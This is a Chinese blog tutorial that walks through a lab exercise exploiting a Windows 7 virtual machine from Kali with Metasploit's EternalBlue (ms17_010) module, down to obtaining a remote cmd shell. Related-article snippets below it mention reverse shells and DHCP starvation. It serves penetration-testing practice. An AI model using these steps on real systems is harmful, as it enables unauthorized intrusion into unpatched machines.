首页 > 其他分享 >kali渗透win7靶机练习

kali渗透win7靶机练习

时间:2023-09-10 17:47:27浏览次数:54  
标签:kali win7 192.168 ip 靶机 输入

1.准备项目:
装有kali linux的虚拟机
win7靶机

2.查看一下kali和win7的ip:

kali的IP为:192.168.164.129

win7靶机的ip为:192.168.164.187

3.将kali切换成root模式:

4.用kali去ping一下win7靶机:
如果ping不动,就要在win7里关掉防火墙(省略)

5.启动Metasploit专用的数据库:
msfconsole

拖到最后会出现这样的字眼:

6.寻找永恒之蓝漏洞代号:ms17_010
search ms17_010

7.使用第0个攻击模块:
use 0

8.查看当前模块所需要配置的参数:
options

9.设置rhosts参数为win7靶机的ip:
set rhosts 192.168.164.187
再输入options查看:

10.LHOST填的是kali主机的ip,默认是填好了的:

11.最后跑一下攻击模块:
输入run,出现以下字眼表示入侵成功:

12.获取win7靶机的shell:
输入shell进入win7靶机的cmd状态:

出现乱码可以输入chcp 65001:

最后可以以cmd的命令方式操作win7靶机等,参考百度! 渗透练习结束!!!

标签:kali,win7,192.168,ip,靶机,输入
From: https://www.cnblogs.com/whoami000/p/17691549.html

相关文章

  • 【32位&64位】最完美WIN7旗舰版软件选装纯净版VIP52.4(2in1)
    【系统简介】1、母盘来自MSDN,精简比较保守,办公什么的理论上应该没啥问题。2、集成软件安装管理器,是集成不是预装,无任何预装软件。3、自己的系统自己玩,想咋玩咋玩,想装啥装啥。4、本次呕心沥血做这次二合一版本,不再做任何解释,懂者自懂,慧者自慧。5、动手能力差的直接去电脑店/电脑城玩......
  • Vulnhub:Kira: CTF靶机
    kali:192.168.111.111靶机:192.168.111.238信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.238访问80端口点击upload发现是个上传点点击language发现存在文件包含上传php图片马再利用文件包含反弹shellhttp://192.168.111.238/languag......
  • kali启动isc-dhcp-server报错
    替换/etc/init.d/isc-dhcp-server文件:(引自https://www.linux.org/threads/isc-dhcp-server-kali-bug.19233)#!/bin/sh#####BEGININITINFO#Provides:isc-dhcp-server#Required-Start:$remote_fs$network$syslog#Required-Stop:$remote_fs$network$syslog#......
  • DHCP饿死攻击及防御(基于ENSP模拟器、Kali攻击机实现)
    相关参数:·Kali攻击机一台·ENSP模拟器 拓扑图:   实验说明:·通过配置DHCP_Server,使得192.168.150.0/24子网内的终端能够自动获取IP地址及DNS·通过配置SW交换机,开启DHCPSnooping功能,用于保证DHCP客户端从合法的DHCP服务器获取IP地址·Kali攻......
  • 如何在移动终端上安装kali系统
    一、起因  很久之前,移动端的终端软件出来的时候,感觉很是新奇,再加上对linux的浓烈兴趣,于是一是兴起,就玩了一会,还记的那款软件叫busybox,当时印象很是深刻,后面又断断续续玩过几次,似乎都没什么成果,感到很是遗憾,于是乘近期有时间,重新拿起,顺便学习一下网络安全相关的知识!接下来,小......
  • Kali系统的常用命令
    Kali系统的常用命令(Linux命令)echo:显示信息date:显示日期和时间ls:列出当前目录,ll:显示详细内容-a:显示所有文件,包括隐藏文件(linux系统中文件名开头为.,表示隐藏文件)-h:人性化显示大小clear:清屏cd:切换目录,cd直接使用回家目录,.:当前目录..:上级目录~:家目录(root账户家目......
  • Vulnhub: INO: 1.0.1靶机
    kali:192.168.111.111靶机:192.168.111.234信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.23480端口目录爆破gobusterdir-uhttp://192.168.111.234/lot-w/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt-xphp,bak,txt,......
  • Win7系统使用高版本node.js
    一、问题描述最近一段时间,由于公司前段构建Vue项目时,使用的是16.1.0版本的Node.js,而个人电脑上安装的是1.016.3导致使用VueUI时,总是提示下图的问题   于是,只好升级Node.js的版本到16.1.0,但是在升级的时候,由于我本人使用的是Win7系统,出现了Thisapplicatonisonlysupp......
  • Vulnhub: Inferno: 1.1靶机
    kali:192.168.111.111靶机:192.168.111.233信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.23380端口目录爆破gobusterdir-uhttp://192.168.111.233-w/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt-xphp,bak,txt,html......
  • win7 系统 AES CFB 抛出不支持异常
    本文记录在win7系统上调用AES加密时,采用CFB模式,可能抛出CryptographicException异常可以看到抛出的异常提示是System.Security.Cryptography.CryptographicException:Thecurrentplatformdoesnotsupportthespecifiedfeedbacksize.异常堆栈如下System.Securit......